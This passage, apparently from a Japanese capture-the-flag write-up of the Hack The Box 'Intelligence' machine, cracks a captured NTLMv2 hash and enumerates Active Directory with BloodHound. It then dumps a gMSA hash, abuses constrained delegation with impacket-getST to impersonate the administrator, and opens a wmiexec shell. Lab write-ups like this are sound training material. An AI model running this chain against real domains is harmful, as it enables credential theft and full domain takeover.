[HTTP] NTLMv2 Hash : Ted.Graves::intelligence:d5ac614bcadda9bf:093108F3016DA9BD7217BE1EDC128C0C:01010000000000008FE31B5910A1DC018F5EBB9FF2BFDF17000000000200080042004F004C00360001001E00570049004E002D004600490036004A00460049004D004A005000430042000400140042004F004C0036002E004C004F00430041004C0003003400570049004E002D004600490036004A00460049004D004A005000430042002E0042004F004C0036002E004C004F00430041004C000500140042004F004C0036002E004C004F00430041004C00080030003000000000000000000000000020000068E863FDF82372259B9CD364178D562069150F5D4AF96DBE933CC101AACB472C0A0010000000000000000000000000000000000009003C0048005400540050002F007700650062002D0074006500730074002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000
ハッシュを解析するとTed.Gravesのパスワードが取得できます。
hashcat -m 5600 hash.txt ./rockyou.txt ---snip--- TED.GRAVES::intelligence:d5ac614bcadda9bf:093108f3016da9bd7217be1edc128c0c:01010000000000008fe31b5910a1dc018f5ebb9ff2bfdf17000000000200080042004f004c00360001001e00570049004e002d004600490036004a00460049004d004a005000430042000400140042004f004c0036002e004c004f00430041004c0003003400570049004e002d004600490036004a00460049004d004a005000430042002e0042004f004c0036002e004c004f00430041004c000500140042004f004c0036002e004c004f00430041004c00080030003000000000000000000000000020000068e863fdf82372259b9cd364178d562069150f5d4af96dbe933cc101aacb472c0a0010000000000000000000000000000000000009003c0048005400540050002f007700650062002d0074006500730074002e0069006e00740065006c006c006900670065006e00630065002e006800740062000000000000000000:Mr.Teddy ---snip---
取得したTed.Gravesのアカウントでドメイン情報を収集します。
┌──(kali㉿kali)-[~/htb] └─$ sudo bloodhound-python -d intelligence.htb -u TED.GRAVES -p 'Mr.Teddy' -c all -ns 10.129.95.154 --zip [sudo] kali のパスワード: INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3) INFO: Found AD domain: intelligence.htb INFO: Getting TGT for user WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc.intelligence.htb:88)] [Errno -2] Name or service not known INFO: Connecting to LDAP server: dc.intelligence.htb INFO: Testing resolved hostname connectivity dead:beef::23b INFO: Trying LDAP connection to dead:beef::23b INFO: Testing resolved hostname connectivity dead:beef::e88e:e5ad:75e0:c5ce INFO: Trying LDAP connection to dead:beef::e88e:e5ad:75e0:c5ce INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 1 computers INFO: Connecting to GC LDAP server: dc.intelligence.htb INFO: Connecting to LDAP server: dc.intelligence.htb INFO: Testing resolved hostname connectivity dead:beef::23b INFO: Trying LDAP connection to dead:beef::23b INFO: Testing resolved hostname connectivity dead:beef::e88e:e5ad:75e0:c5ce INFO: Trying LDAP connection to dead:beef::e88e:e5ad:75e0:c5ce INFO: Found 43 users INFO: Found 55 groups INFO: Found 2 gpos INFO: Found 1 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: dc.intelligence.htb INFO: Done in 00M 57S INFO: Compressing output into 20260218224013_bloodhound.zip
Ted.GravesはITSupportグループに所属しており、このグループはSVC_INTにReadGMSAPasswordの権限を持っています。
gMSA(グループ管理サービスアカウント)は、AD環境のサービスアカウントで、gMSAのパスワードは自動で管理されます。
gMSADumperは、取得権限を持っているgMSAのパスワードをダンプすることができます。
┌──(myenv)─(kali㉿kali)-[~/opt/gMSADumper] └─$ python3 gMSADumper.py -u 'TED.GRAVES' -p 'Mr.Teddy' -d intelligence.htb Users or groups who can read password for svc_int$: > DC$ > itsupport svc_int$:::0d5463c6e805b0908b61e90cf9219dc3 svc_int$:aes256-cts-hmac-sha1-96:4bd3d5d159cf43ed1b1fdbf706b3899de4772a12cf5b206b4ec41663bda74956 svc_int$:aes128-cts-hmac-sha1-96:3a75bf4dc94d2f020c848f8c5f350530S
BloodHoundでSVC_INTの情報を確認します。
ADにはあるサービスが他のユーザーになりすまして別のサービスにアクセスすることができる「委任(Delegation)」という仕組みがあり、SVC_INTはWWW/dc.intelligence.htbとしてアクセスする権限があります。
impacket-getSTで管理者のサービスチケットを取得します。
なお(Clock skew too great)のようなエラーになる場合はNTPの同期を行ったうえで再度実行します。
┌──(kali㉿kali)-[~/opt/gMSADumper] └─$ impacket-getST -dc-ip 10.129.95.154 -spn www/dc.intelligence.htb -hashes :0d5463c6e805b0908b61e90cf9219dc3 -impersonate administrator intelligence.htb/svc_int Impacket v0.14.0.dev0+20260109.161801.028f0724 - Copyright Fortra, LLC and its affiliated companies [-] CCache file is not found. Skipping... [*] Getting TGT for user [*] Impersonating administrator [*] Requesting S4U2self [*] Requesting S4U2Proxy [*] Saving ticket in administrator@www_dc.intelligence.htb@INTELLIGENCE.HTB.ccache
参考:NTPの同期
チケットが取得できたら管理者としてアクセスします。
┌──(kali㉿kali)-[~/opt/gMSADumper] └─$ KRB5CCNAME=administrator@www_dc.intelligence.htb@INTELLIGENCE.HTB.ccache impacket-wmiexec -k -no-pass administrator@dc.intelligence.htb Impacket v0.14.0.dev0+20260109.161801.028f0724 - Copyright Fortra, LLC and its affiliated companies [*] SMBv3.0 dialect used [!] Launching semi-interactive shell - Careful what you execute [!] Press help for extra shell commands C:\>whoami intelligence\administrator C:\>
その他
